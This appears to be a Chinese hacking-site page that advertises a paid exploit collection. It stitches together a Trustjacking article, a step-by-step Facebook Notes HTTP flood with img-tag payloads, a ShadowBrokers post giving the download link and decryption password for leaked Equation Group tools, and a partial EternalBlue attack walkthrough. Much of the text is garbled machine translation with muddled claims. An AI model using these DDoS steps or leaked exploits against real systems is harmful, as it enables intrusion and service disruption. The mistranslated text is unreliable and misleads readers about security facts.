中国骇客云近几年收集的exp,如果您是渗透大手或者想研究exp的可以下载使用它!

中国骇客云近几年收集的exp利用!如果您是一位渗透大手..可以下载使用和研究它!!
最全的exp利用尽在www.anonymouschina.org   www.anonymouschina.com   国际官网:www.hackerschina.org

隐藏内容: ********, 支付¥22.80下载

中国骇客云iOS trustjacking iPhone远程黑客攻击漏洞详细0day介绍!

Trustjacking

最新IOS的黑客远程攻击漏洞0day  更多关注骇客云平台官网!

赛门铁克的研究人员发现在iPhone用户对设备和Mac工作站和笔记本电脑的漏洞。他们说,攻击者可以利用这个漏洞,他们为Trustjacking接管设备没有手机主人的知识。

在技术层面的安全问题,trustjacking植根于“iTunes Wi-Fi同步”功能,包括iTunes。

如果在iTunes设置启用此选项,当Mac笔记本电脑/工作站的主人同步到他的计算机的一个新的iPhone,这个特点让他在任何时间连接到智能手机通过本地WiFi网络,而是采用有线电缆。

的特点是方便和充足的理由,因为它允许PC用户很容易地检索或发送数据从手机通过iTunes应用程序和API。

iTunes WiFi sync feature

但是,赛门铁克的研究人员说,这个功能的设计是有缺陷的,继续给予计算机所有者获得配对的iPhone通过本地WiFi网络,即使iPhone设备从计算机断开连接。

攻击者可以通过本地WiFi控制iPhone

介绍他们的结果今天在RSA 2018安全大会上,Roy Iarchy、赛门铁克和现代操作系统安全研究主管表示,攻击者可以滥用iTunes Wi-Fi同步功能,把一个后来装置的控制,没有对设备用户可见的指示。

Iarchy说,一旦iTunes无线同步功能是启用的,和一个受害者被诱骗的配对与恶意设备,攻击者可以使用iTunes的API以重复的截图在很短的时间间隔发送截图到iTunes应用程序记录用户的智能手机屏幕。

此外,攻击者还可以安装或删除应用程序,都没有与iPhone用户的任何交互,甚至可以触发一个远程备份,把它发送到他的电脑,后来通过受害者的数据。

社会工程的需要…不需要

显然,这种攻击是不可能的没有社会工程,为iPhone用户仍然需要点击弹出,出现在他的iPhone和同意与攻击者的设备配对。

你会认为这限制了攻击面只有在什么情况下你都很着急,并同意与一个陌生人的笔记本电脑,这样你可以给你的电话你的设备对。

但现实的情况是不同的trustjacking攻击。Iarchy说,恶意软件感染您的Mac笔记本电脑/工作站可以使用自动化脚本“iTunes WiFi同步”功能,然后检索数据或任何感染的配对的iPhone连接到同一WiFi网络。

进一步的攻击,甚至可以在互联网上工作,不仅通过本地WiFi网络,如果Mac电脑是在同一个VPN网络作为配对的iPhone。

赛门铁克说,trustjacking补丁是不完整的

赛门铁克表示,它通知问题的苹果,但苹果的解决方案来解决trustjacking攻击的问题没有请其研究人员。

苹果走的解决方法是向iPhone用户输入手机密码时对计算机。这将防止一些人迅速拿起手机打给自己的笔记本电脑配对。

但是,赛门铁克表示,这个更新了iOS并没有解决iTunes WiFi同步能够检索数据从设备即使在用户从计算机断开连接配对的问题,因为攻击者仍然可以使用iTunes,如果它仍然在默默地连接到智能手机的WiFi范围。

“虽然我们很欣赏的缓解,苹果已经采取了,我们想强调的是它没有解决trustjacking以整体的方式。一旦用户选择信任的电脑受损,利用剩下的继续工作了,”Iarchy说,在今天的博客。

“不幸的是,没有办法列出所有受信任的计算机和撤销访问选择性,”专家说。”确保没有多余的电脑被你的iOS设备的信任的最好的办法是去清洁的可信计算机列表Settings > General > Reset > Reset Location & Privacy现在,您将需要重新授权所有先前连接的电脑,下次你的iOS设备连接到每个设备。”

中国骇客云最新漏洞通过 Facebook Notes的漏洞 可以 DDOS 攻击任何网站

Facebook Notes 允许用户使用<img>标签。每当使用<img>标签时,Facebook会从外部服务器抓取图像,并将其缓存起来。然而Facebook利用随机GET参数只缓存图像一次,该缓存可以被绕过,滥用这个属性会造成巨大的HTTP GET泛洪。

下面是我在2014年3月3日报告给Facebook漏洞奖赏计划的过程。

步骤 1.创建一系列img标签,这些标签只被抓取了一次。

1
2
3
4
<img src=http://targetname/file?r=1></img>
<img src=http://targetname/file?r=1></img>
..
<img src=http://targetname/file?r=1000></img>

步骤 2. 使用m.facebook.com创建 notes。它默认整理为固定长度。

步骤 3. 相同用户或者不同用户创建多个notes。每一个都会相应1000 多个的http请求。

步骤 4. 同一时间查看所有的notes,目标服务器会观察到有大量的HTTP GET泛洪。成千上万的GET请求在几秒钟发送到一台服务器。并行访问Facebook的服务器的总数是100多。

初始回应:问题被拒绝,因为他们误解了这个bug只会导致一个404的要求,不能够造成高危害。

通过几封邮件后,我被要求举证说明影响。我启动了一个云端上的目标虚拟机,在三台笔记本电脑上只使用浏览器,2-3小时内我实现了400 Mbps的出站流量。
图片1
Facebook的服务器数量:127

当然,影响可能会超过400 Mbps的,因为我只使用了浏览器为这个测试,并且我也受由每个获取的图像的域的浏览器线程数量限制。我创建概念验证的脚本,它可能会导致更大的影响和利用图像向Facebook发送脚本。

4月11日,我得到答复:

“感谢您的耐心和我这里的长时间拖延表示歉意。我们对这一问题进行了讨论,并跟另一个团队进行了深入探讨。

最后,得出的结论是,没有好的方式来解决这个问题,不可能不显著降低整体功能而阻止对小型消费级网站的“攻击”。

不幸的是,所谓的“解决不了”的项目就不在奖赏漏洞的计划内,所以不会有奖励这个问题。但我想表示感谢,而且我觉得c提出的攻击是有趣的,你显然做了很多工作。我们也希望您继续提交您找到Facebook的漏洞。”

我不知道为什么他们不能解决。在图像标签支持动态链接可能是一个问题,我不是它的忠实粉丝。如果他们想有动态生成的图像,我觉得手动上传就能满足用户的需要。

我也看到了这种类型滥用的一些其他问题:

  • 流量放大的情况下:当图像被替换为较大尺寸的PDF或视频时, Facebook会捕获到一个巨大的文件,但用户什么也得不到。

每个notes支持1000多条链接,和Facebook会锁定用户在产生100个信息后。由于没有验证码的注释产生,所有这一切都可以实现自动化,攻击者可以使用多个用户轻松准备数百个说明虽然持续400 Mbps可能是危险的,但我这测试是最后一次,看它是否确实能有较大的影响。不使用浏览器,而使用POC脚本我能搞定 900 Mbps的出站流量。
图片2
我使用了一个普通的13 MB的PDF文件,被Facebook的处理了180,000多次,涉及Facebook的服务器数量是112。

我们可以看到流量图是在895 Mbps上下浮动的。这可能是因为施加于我的虚拟机在其上使用共享Gbps的以太网端口云计算的最大流量的限制。但这似乎没有限制在Facebook的服务器上,所以我们可以想象到底能获取多少流量。

发现并报告此问题后,我发现谷歌上的类似的问题。结合谷歌和Facebook ,似乎我们可以很容易得到Gbps的流量。
Facebook的处理功能显示自己可以作为facebook的扩展工具。现在它似乎没有其他的选择,而必须阻止它,以避免这种滋扰。

[更新1]
提到提到一种方式来获得Facebook获取的IP地址。

1
whois -h whois.radb.net — ‘-i origin AS32934′ | grep ^route

阻塞IP地址可能会比阻止用户代理更有效。我在博客上已经得到了很多的回应,并想感谢DOSarrest团队承认这个发现。

[更新 2]

POC脚本和访问日志现在可以从Github上访问。这个脚本非常简单,仅仅是一个粗略的草稿。请使用它们仅用于研究和分析。

访问日志是我用于900 Mbps的测试的确切的日志。在访问日志,你会发现来自Facebook 300,000 多的请求。以前,我只计算了facebookexternalhit/1.1 ,似乎每个IMG标签,有两个攻击,即一个来自1.0版本。另一个则是1.1的。我也尝试了谷歌,你也会发现来自谷歌的700多条数据。

下个星期注定要发生很多事情,中国骇客云提醒大家ShadowBroker近期将发布多种Windows零日利用工具,黑客圈将发现大量的0day漏洞!

 

北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包,这是继上周4月8号第一波放出EQGRP-Auction-Files 文件解密密码(http://bobao.360.cn/news/detail/4107.html )之后,又一次的大规模公开的放出解密密码,现在任何感兴趣的人员都可以直接下载解密。

原文件下载地址

https://yadi.sk/d/NJqzpqo_3GxZA4

解密密码

Reeeeeeeeeeeeeee

sha256 hashes

原文件:

7c19a67d728bc700d18d2ed389a80de495681b7097222d9b8f1d696f0986f9a2 odd.tar.xz.gpg

78b89b2c4b129400150c7b60a426ff469aaea31da1588d2abc4180feaa9c41d3 swift.tar.xz.gpg

c28d5c10ec78bc66d3868e4862c7f801ffd561e2116b529e0782bf78f3ef3255 windows.tar.xz.gpg

解密后的文件

85e03866ae7eaaedd9462054b62a10f2180983bdfd086b29631173ae4422f524 odd.tar.xz

df468f01e65f3f1bc18f844d7f7bac8f8eec3664a131e2fb67ae3a55f8523004 swift.tar.xz

5bb9ddfbcefb75d017a9e745b83729390617b16f4079356579ef00e5e6b5fbd0 windows.tar.xz

事件时间轴


1. 在2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美元)。而“Shadow Brokers” 的工具一直没卖出去。

2. 北京时间 2017 年 4 月 8 日,“Shadow Brokers” 公布了保留部分的解压缩密码,有人将其解压缩后的上传到Github网站提供下载。

3. 北京时间 2017 年 4 月 14 日晚,继上一次公开解压密码后,“Shadow Brokers” ,在推特上放出了第二波保留的部分文件,下载地址为https://yadi.sk/d/NJqzpqo_3GxZA4,解压密码是 “Reeeeeeeeeeeeeee”。 此次发现其中包括新的23个黑客工具。具体请参考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等。

简要分析


有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具。具体请参考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等

第二波解密的黑客工具包内容包括odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg

windows: 包括 Windows利用工具, 植入式的恶意软件 和一些攻击代码

swift: 包括 银行攻击的一些内容

oddjob: 包括与ODDJOB 后门相关的doc

据相关研究人员称:

Windows文件夹包含对Windows操作系统的许多黑客工具,但主要针对的是较旧版本的Windows(Windows XP中)和Server 2003。

其中“ETERNALBLUE是一个0day RCE漏洞利用,影响最新和更新的Windows 2008 R2 SERVER VIA SMB和NBT!”一位名叫Hacker Fantastic在推特上称。

OddJob文件夹包含基于Windows的植入软件,并包括所指定的配置文件和有效载荷。虽然目前这种植入软件的细节很少,但OddJob适用于Windows Server 2003 Enterprise(甚至Windows XP Professional)。

http://p6.qhimg.com/t015ba4451bfeccef37.png

SWIFT文件夹包含PowerPoint演示文稿,证据,凭证和EastNets的内部架构,EastNets是中东最大的SWIFT服务商之一。

http://p7.qhimg.com/t01132e0d08e1958dee.png

SWIFT(全球银行间电信协会)是一个全球性的金融信息系统,全球数千家银行和组织每天都在转移数十亿美元。

该文件夹包括从Oracle数据库查询信息的SQL脚本,如查询数据库用户列表和SWIFT消息。

http://p0.qhimg.com/t01daf09245f711d59a.png

此外,该文件夹还包含Excel文件,表明国安队的精英网络攻击单位方程组织已经入侵,并获得了世界各地许多银行的访问权,其中大多数位于中东,如阿联酋,科威特,卡塔尔,巴勒斯坦,也门。

漏洞影响


根据FOFA系统统计显示,全球对外可能受到影响的超过750万台,中国可能有超过133万受到影响。其中全球约有542万的RDP服务和约有208万的SMB协议服务运行在windows上(仅为分布情况,非实际漏洞影响),其中,中国地区超过101万RDP服务对外开放,SMB协议超过32万。根据白帽汇测试,从windows 2000到Windows2008都受到这工具包中影响,成功率非常之高。另外,内部网络中也大多开启445端口和139端口,也将会成为黑客渗透内网的大杀器。

http://p7.qhimg.com/t01ba55d5d21e1b4f78.png

RDP服务全球分布情况(仅为分布情况,非实际漏洞影响)

http://p3.qhimg.com/t0185d28c29ab76ed6f.png

RDP服务中国地区分布情况(仅为分布情况,非实际漏洞影响)

http://p0.qhimg.com/t01a8371d955af4a702.png

Windows系统上SMB服务全球分布情况(仅为分布情况,非实际漏洞影响)

http://p2.qhimg.com/t01ed92ad8b69cb4f3e.png

Windows系统上SMB服务中国分布情况(仅为分布情况,非实际漏洞影响)

漏洞利用


ETERNALBLUE漏洞利用模块,windows7 sp1 64位版本和windows 2003 sp2 32版本测试成功截图。

http://p8.qhimg.com/t012ec7214f6955918d.png

Windows 7 利用成功并反弹shell

http://p6.qhimg.com/t01f345bbbfdaad0365.png

修复建议


1.升级到微软提供支持的Windows版本,并安装补丁:https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

2.安装相关的防护措施,如缓冲区溢出防御软件,杀毒软件。

3.无补丁的Windows版本,临时关闭135、137、445端口和3389远程登录。

更新:  EastNets否认SWIFT受黑客影响


在今天发表的官方声明中,EastNets否认其SWIFT受到影响,并表示黑客的报道是“完全虚假和毫无根据的”。

“所谓的黑客入侵的EastNets服务商(ENSB)网络的报告是完全虚假的,毫无根据的,EastNets网络内部安全部门对其服务器进行了全面检查,发现没有黑客的足迹或任何漏洞。

The Dangers of the Windows Mobile Phone HACKERSCHINA

Introduction and Overview of the Last Article

Our last article examined in greater detail the threats that are posed to the iOS Operating System, which in turn affects all of the wireless devices, which primarily include those of the iPhone and the iPad.

There is often this feeling of safety when using these devices. The major part of this reasoning is that in reality, Apple has not been afflicted as much with Cyber-attacks as much as the Samsung and the Windows mobile devices have been.

Security experts have noted that Apple goes to extraordinary lengths to ensure that their devices are as hacker proof as possible. For example, there are extremely rigorous Quality Control processes in place, as well as other systems of checks and balances to ensure that only the authorized end user is accessing his or her own iPhone or iPad.

To this extent, Apple has even introduced the use of Biometric Technology to provide a Two-Factor (also known as “2FA”) security approach. This can also be thought of as a “Multi-Modal” approach as well. Really, any Biometric could work in this regard, but Apple chose to make use of Fingerprint Recognition because not only of its strong levels of Ease of Use but also it is the most widely accepted Biometric Technology worldwide.

This push by Apple only came to fruition after it bought a Biometrics Vendor known as “Authentic” in a Merger and Acquisition (M&A) activity. At the time, Authentec was the premier provider of Fingerprint Recognition Sensors to the Biometrics industry, with a specialty in manufacturing Optical based Sensors.

In fact, this same technology is even being used in the “Apple Pay,” which is basically Apple’s version of the Mobile Wallet. This and the use of Biometric Technology in the Smartphone will be topics of separate articles in the future.

However, as our last two articles have shown, Apple can be just as prone to Cyber-attacks as well. The first article looked at uploading rogue mobile applications onto the App Store by manipulating the Digital Certificates, which are granted to an end user after they have created an account for themselves. The second article examined other Cyber based attacks, which include the following:

  1. A Malicious Configuration Profile:

    Most wireless devices consist of this file for it to make the end user to properly set up their Apple wireless device correctly the first time quickly and easily. However, the Cyber attacker has found a way in which to create a malicious Configuration Profile and inject that into the iPhone or the iPad.

  2. The WebKit Vulnerability:

    This is a software package, which is used to power the Safari Web Browser. In fact, Apple is not just using it; Google in their Chrome Web Browser is also using it. However, despite the efforts to safeguard this package, the Cyber attacker has found ways in which to inject malicious .exe files into it, with the end result being that the end user is redirected to a spoofed Website.

  3. The Zero Day Attack:

    In these situations, the Cyber attacker has advanced knowledge of a weakness or a vulnerability in the Source Code and takes full advantage of it before the Vendor even knows about it.

In this article, we continue with the theme of Security threats, which are posed to Smartphones-but this time, the focal point is on the Windows Mobile devices.

The Windows Mobile Operating System

Yes, we have all heard of the Windows Operating Systems. By far, it is the most widely used OS in the world, ranging from the Workstation to the Server editions. These have ranged all the way from Windows 95 to Windows XP to Windows Vista to the latest version now, which is running, Windows 10.

When compared to just about any other software application or OS (including even the Open Source ones such as that of Linux), Windows has been the most sought after prize of the Cyber attacker.

For example, just about every piece Malware, Spyware, Adware, and even Trojan Horse has found its way into it. However, unlike the other Wireless Vendors that have made a separate and unique Operating System for their Smartphone product lines, Microsoft took an entirely different approach, utilized their existing Operating Systems, and modified so that it would be the OS for their mobile phone line.

For example, since the latest version is Windows 10, Microsoft simply took the underlying Source Code of that and modified it fit their Smartphone models, and rebranding it as merely “Windows 10 Mobile”. This Operating System is now available on the Lumia line of Smartphones, which include the Lumia 635, the Lumia 730, and the Lumia 830.

Microsoft’s fundamental reason for taking this approach is that it wanted to “. . . share many of the same features as its desktop version, including the same kernel, UI elements, menus, Settings, and even Cortana.” (SOURCE: 1).

But however, there is one fatal flaw in taking this kind of approach: The same type of Cyber threats and risks which are posed to the Windows Operating Systems on the Workstations and Servers can also be used to manipulate the OS’s which reside on the Windows line of Smartphones.

Therefore, on a theoretical plane, the effects of one Cyber-attack on a Windows platform will thus be greatly proliferated onto the mobile devices, and vice versa.

TheRisksPosed to the Windows Mobile Operating System

ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

  1. Making Network based Files and Shared Resources available to everybody:

    Although the Windows 10 Operating System has put in extra safeguards to protect private and confidential files of businesses/corporations and even the end user, the rights, which are granted to access them, seem to be misconfigured at times, and this is an escalating trend that is of grave concern. This can happen for a wide myriad of reasons, such as employees who really do not know how to assign permissions properly, or even the Network/System Administrators who are so overloaded in their work that he or she does not double check the permissions that they grant. However, more often than not, it is also the work of the Cyber attacker who is also misconfiguring these specific rights and permissions as well. What is interesting about this trend is that the Cyber attacker is not out for personal gain in these matters; rather their main intent is to cause financial loss to a business or a corporation when their files and resources become available to the public at large. This type of attack is especially worrisome on the Windows Mobile devices, as many employees now use this tool to store both personal and work related files, as literally millions of wireless devices can fall victim in just a matter of minutes. It should be noted that the primary target in this kind of attack is in exposing the “Everyone Group” directory in the Windows 10 Operating System.

  2. Lack of Enablement of the Personal Firewall:

    As it was described in the last article, Apple develops a specific Configuration File for the end user to set up their iPhone properly. A major component of this is also making sure that the Security features have been enabled as well. This even includes the Personal Firewall. In sharp contrast, although the Windows 10 Operating System does have a feature related to the Apple Configuration File, the Security features which come on it are not all preset. In other words, the end user has to configure all of this themselves manually. Even though Windows 10 has a highly GUI centered approach for doing this both on the workstation and Mobile Device, it can still be very confusing if not daunting for the end user to configure the Security features and the Personal Firewall properly. As a result, they often give up, thus making their Wireless device that much more prone to a Malware or Spyware Attack. But on the flip side, the Personal Firewall on the Windows 10 OS has been deemed to be a powerful to use, such as when it comes to protecting the IPC$ and ADMIN$ share files. It has also been known to block out effectively any type or kind of Wireless Intrusion Attacks.

  3. Unaccounted for Systems which are running in the background:

    Because the Windows 10 Operating System is deemed to be in some ways “bloated” because of its Closed Source platform, there is one Security weakness it possesses that can affect both the workstation and the mobile devices: It’s lack of accounting for those resources which run in the background. What this means essentially is that the OS may not even be “aware” at times of the services and other related software applications which are running in the background. This very often includes the Internet Information Services (also known as the “IIS”-this is the Web Server software) and the SQL Server Express (this is the free and “watered down” version of the SQL Server Database). Because of this lack of unaccountability, a Cyber attacker can take advantage of this very quickly, and insert a malicious payload, which can spread itself very quickly.

  4. There are no minimum Security Thresholds or Standards which have been established:

    As described, although the Windows 10 Operating System does indeed come with a robust set of Security features, there is still another area in which it is severely lacking –a lack of Best Standards for the businesses and corporations to adopt which make use of this OS on their Windows Mobile devices. Because of this, the IT Staff at many organizations are often left to their own guises to experiment which Security features of Windows 10 are needed and those that are needed to come into compliance with the Security Policies, which have been set forth and established. As a result, there can be significant periods of when the “Security guard is let down,” thus making a very fertile time period for the Cyber attacker to launch a wide-scale attack upon the organization.

  5. The Windows 10 for Mobile Phones cannot be tested using the traditional tools:

    Sure, the Windows 10 OS can be tested to make sure that it does indeed come into compliance with the Security requirement and needs of the business entity. However, since this is the latest version from Microsoft, it requires the latest tools to test. The companies with the bigger budgets could probably afford to have these tools, and perhaps even hire top of the line Penetration Testers. Nevertheless, the truth of the reality is that many of the smaller to medium-sized businesses cannot afford this, and as a result, are forced to test their Windows Mobile with outdated testing tools. This leads to incomplete and very often inaccurate results, which will make the Windows Mobile device that much more vulnerable to a Cyber based attack. Another problem compounding this issue is that Windows 10 is based on a Closed Source platform (just like the older OS versions and other Microsoft products), so trying to conduct a Penetration Test on the Source Code is very difficult, if not impossible, to accomplish.

  6. Automated Updates and Patches:

    Windows 10 is notorious for this feature. It often occurs at the most inconvenient times. Although the primary intention of this is to keep the Windows Mobile device up to date with the latest Security Patches, there is a chance that one of those updates could very well be a rogue application (such as a Malware or a Spyware) inserted into the process by a sophisticated Cyber attacker. Unfortunately, there is no way of knowing of this until it is too late. For instance, the Windows 10 OS will only notify you which specific updates and/or patches have been installed after the fact.

Conclusions

In summary, this article has examined the Security threats and risks which are posed to the primarily to the Windows 10 Operating System (OS). As it was discussed earlier, this OS is not only available for the workstation and PCs, but it has also been modified and restructured in such a way by Microsoft that it is also available on their Windows Mobile phone product line as well.

Although this might have proven to be an effective strategy regarding cost savings, it also presents a double-edged sword when it comes to Security: For instance, the same threats, which are inherent to the workstation and PC versions, are also targeted to the mobile phone versions of the Windows 10 OS.

Thus far, in this series, we have examined the Security Vulnerabilities to all three major mobile phone OSs:

  1. The iOS
  2. The Android OS
  3. The Windows 10 Mobile OS.

A future article will examine how an end user, or even a business entity, can take preventative steps to make sure that their Smartphone does not become the target for a Cyber based attack. Our next article will focus on another Security concept of the Smartphone – “Jailbreaking.”

文章的最后检查更详细,对iOS操作系统的威胁,这反过来又影响了所有的无线设备,它主要包括iPhone和iPad。

经常会有这种安全感的时候使用这些设备。这个推理的重要组成部分,在现实中,苹果并未受到尽可能多的网络攻击一样,三星和Windows Mobile设备已。

安全专家指出,苹果正在竭尽全力确保他们的设备是为防黑客可能。例如,有在地方非常严格的质量控制流程,以及其他的制衡系统,确保只有授权的用户访问他或她自己的iPhone或iPad。

在这个意义上,苹果还介绍了生物识别技术提供一二的使用系数(也被称为“2fa”)的安全方法。这也可以看作是一个“多模态”的方法以及。真的,任何生物能够在这方面的工作,但苹果采用指纹识别不仅因为其强大的水平的易用性也是最被广泛接受的生物技术世界。

这推动苹果只实现了之后就买了一个生物识别厂商称为“正宗”,在合并和收购(M&#38;A)活动。当时,AuthenTec是指纹识别传感器的生物识别行业的领先供应商,在制造光学传感器专业。

事实上,这一技术甚至被用在“苹果支付,“这基本上是苹果版的移动钱包。这和生物识别技术在智能手机的使用将是未来独立的文章主题。

然而,当我们最后的两篇文章显示,苹果就可以容易的网络攻击以及。第一篇看着上传流氓的移动应用程序到应用程序商店通过操纵数字证书,并授予最终用户在他们为自己创造了一个账户。第二条审查其他基于网络的攻击,包括:

  1. A:恶意配置剖面

    大多数无线设备包括这个文件,它使最终用户正确设置他们的苹果无线设备正确的第一时间快速和容易。然而,网络攻击者已经发现了一种创建一个恶意配置文件注入到iPhone或iPad。

  2. WebKit漏洞:

    这是一个软件包,它是用来发电的Safari浏览器。事实上,苹果不仅仅是使用;谷歌的Chrome浏览器也使用它。然而,尽管维护这个包的努力,网络攻击者已经发现如何在其中注入恶意。exe文件到它,其结果,最终用户将被重定向到一个假冒的网站。

  3. 零日攻击:

    在这种情况下,网络攻击者有一个弱点或源代码中的一个漏洞,先进的知识和充分利用它之前,供应商甚至知道它。

在这篇文章中,我们将继续与安全威胁的主题,是带来的智能手机,但这一次,重点是对Windows移动设备。

Windows Mobile操作系统

是的,我们都听说过Windows操作系统。到目前为止,它是世界上使用最广泛的操作系统,从工作站到服务器版本。这些都为所有的方式从Windows 95到Windows XP到Windows Vista的最新版本,这是运行Windows 10。

相比于任何其他的应用软件或操作系统(甚至包括开源的如Linux),Windows已经是最受欢迎的网络攻击者奖之后。

例如,几乎每一件恶意软件,间谍软件,广告软件,木马,甚至已经到了它。然而,不像其他无线厂商有了自己的智能手机产品线的一个单独的和独特的操作系统,微软采取了一种完全不同的方法,利用他们现有的操作系统,和修改,这将是他们的移动电话操作系统。

例如,由于是最新版本的Windows 10,微软只是把那底层源代码和修改它适合他们的智能手机,并将其命名为仅仅是“Windows 10移动”。该操作系统是目前智能手机Lumia线,包括Lumia 635、Lumia 730和Lumia 830。

微软的根本原因采取这种方法是想”。..分享许多相同的功能,它的桌面版本,包括相同的内核,UI元素,菜单,设置,甚至Cortana。”(来源:1)。

但是,在以这种方法有一个致命的缺陷:网络威胁,这是对Windows操作系统的工作站和服务器的风险同样也可以用来操纵操作系统驻留在智能手机的Windows系。

因此,在理论上,在Windows平台的网络攻击的影响将大大增加到移动设备,反之亦然。

这个风险对Windows Mobile操作系统

道德黑客培训–资源(信息安全)

  1. 使基于网络的文件和共享资源提供给大家:

    虽然Windows 10操作系统已经投入额外的安全措施以保护企业/公司的机密文件,甚至最终用户的权利,这是授予访问它们,似乎是错误的时候,这是一个上升的趋势,严重关注。这可以为各种不同的原因发生,如员工们真的不知道如何分配权限是否正确,甚至网络/系统管理员谁是如此超负荷工作,他或她没有仔细检查权限授予。然而,更多的往往不是,它也是网络攻击者也错误配置这些具体的权利和权限以及工作。这个趋势,有趣的是,网络攻击者是不是出在这些事情上个人利益;而他们的主要意图是导致经济损失的企业或公司在他们的文件和资源提供给广大公众。这种类型的攻击是非常令人担忧的Windows移动设备,许多员工现在使用这个工具来存储个人和工作相关的文件,为数以百万计的无线设备可以牺牲品就是几分钟的事。应该指出的是,在这类攻击的主要目标是在Windows 10操作系统将“每个人组”目录。

  2. 对个人防火墙支持的缺乏:

    因为它是在上一篇文章中描述,苹果为最终用户建立自己的iPhone适当开发一个特定的配置文件。这是一个重要组成部分也确保安全功能已启用,以及。这甚至包括个人防火墙。形成鲜明对比的是,尽管Windows 10操作系统也有一个苹果的配置文件相关的特征,这是它的安全功能是不是所有的预设。换句话说,用户必须配置这一切自己手动。尽管Windows 10有一个高度的GUI为中心的方法,这样做既对工作站和移动设备,它仍然可以非常混乱,如果不畏惧为最终用户配置的安全功能和个人防火墙的正确。因此,他们往往放弃,从而使自己的无线设备,更容易出现恶意软件或间谍软件的攻击。但另一方面,在Windows 10操作系统的个人防火墙已经被认为是一个强大的使用,如当谈到保护IPC$和ADMIN$共享文件。它也被称为阻止了有效的任何类型或无线入侵种。

  3. 下落不明,在后台运行系统:

    由于Windows 10操作系统被认为是在某些方面“臃肿”因其闭源的平台,有一个安全漏洞,它具有可以影响工作站和移动设备:它是在后台运行的资源缺乏,会计。这实际上意味着操作系统甚至可能不“知道”的服务和其他相关的软件应用程序在后台运行的时候。这通常包括Internet信息服务(也被称为“IIS”-这是Web服务器软件)和SQL Server Express(这是免费的,“淡化”版本的SQL Server数据库)。由于缺乏这种不负责任的,网络攻击者可以利用这个非常快,并插入一个恶意的有效载荷,它可以传播很快。

  4. 有没有最低的安全阈值或已建立的标准:

    如前所述,尽管Windows 10操作系统确实有强大的安全功能,还有另一个领域,这是严重缺乏–缺乏最佳标准,采取利用该操作系统的Windows移动设备的企业和公司。因此,IT人员在许多组织往往是留给自己的伪装实验安全功能的Windows 10是被需要的,那些是需要进入安全策略的一致性,并提出了建立。作为一个结果,可以有显着的时期,当“保安是失望,使一个非常肥沃的时间段的网络攻击者发动大规模攻击的组织。

  5. Windows 10的手机无法使用传统工具进行测试:

    当然,10 OS可以测试以保证它确实进入了企业法人的安全要求和需要遵守的窗户。然而,由于这是微软的最新版本,它需要新的工具来测试。与更大的预算的公司可能负担得起这些工具,甚至聘请顶级的渗透测试。然而,现实的事实是,许多小型到中型的企业无法承受,因此被迫要测试他们的Windows Mobile和过时的测试工具。这导致了不完全的和经常不准确的结果,这将使Windows移动设备,更容易受到网络攻击。另一个问题,这个问题是,Windows 10是一个基于开放源代码的平台(就像旧的操作系统版本和其他微软产品),所以要对源代码进行渗透测试是非常困难的,如果不是不可能的,完成。

  6. 自动更新和补丁:

    Windows 10的这个功能是臭名昭著的。它往往发生在最不方便的时候。虽然这主要是保持Windows移动设备是最新的最新的安全补丁,这是一个机会,一个更新的很可能是一个流氓应用程序(如恶意软件或间谍软件)插入的过程中,通过一个复杂的网络攻击。不幸的是,有没有办法知道这个直到为时已晚。例如,Windows 10操作系统只会通知你具体的更新或补丁已经在事实之后安装。

结论

综上所述,本文研究的安全威胁和被提出的主要是针对Windows 10操作系统(OS)的风险。就像前面所讨论的,这种操作系统不仅可用于工作站和个人电脑,但它也被修改,在这样一种方式,通过微软,它也可以在自己的Windows手机产品线以及重组。

虽然这可能被证明是关于节约成本的有效方法,同时还介绍了一把双刃剑,当它涉及到安全性:例如,同样的威胁,这是工作站和PC版本与生俱来的,也有针对性的手机版本的Windows 10操作系统。

到目前为止,在这个系列中,我们已经研究了安全漏洞的所有三个主要的手机OSs:

  1. iOS
  2. Android操作系统
  3. Windows 10移动操作系统。

以后的文章将研究如何最终用户,甚至企业实体,可以采取预防措施来确保他们的智能手机并没有成为一个基于网络的攻击目标。我们的下一篇文章将重点放在智能手机–“越狱的另一个安全的概念。”

中国骇客云方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

最近方程式的漏洞着实火了一把,根据网友的需求分析了下githup上面的文件目录,找到了利用文件,
主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,
利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

1 .环境搭建

win2003 攻击机:ip:192.168.0.28
kali 攻击机:ip:192.168.0.27
win7 靶机:ip:192.168.0.14

PS:netstat -an 查看端口开发情况,确保445端口开启

另外:win2003攻击机需要安装有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。

方程式ETERNALBLUE 下载地址:www.hackerschina.org点我下载.;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。

在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

2.测试过程

进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。

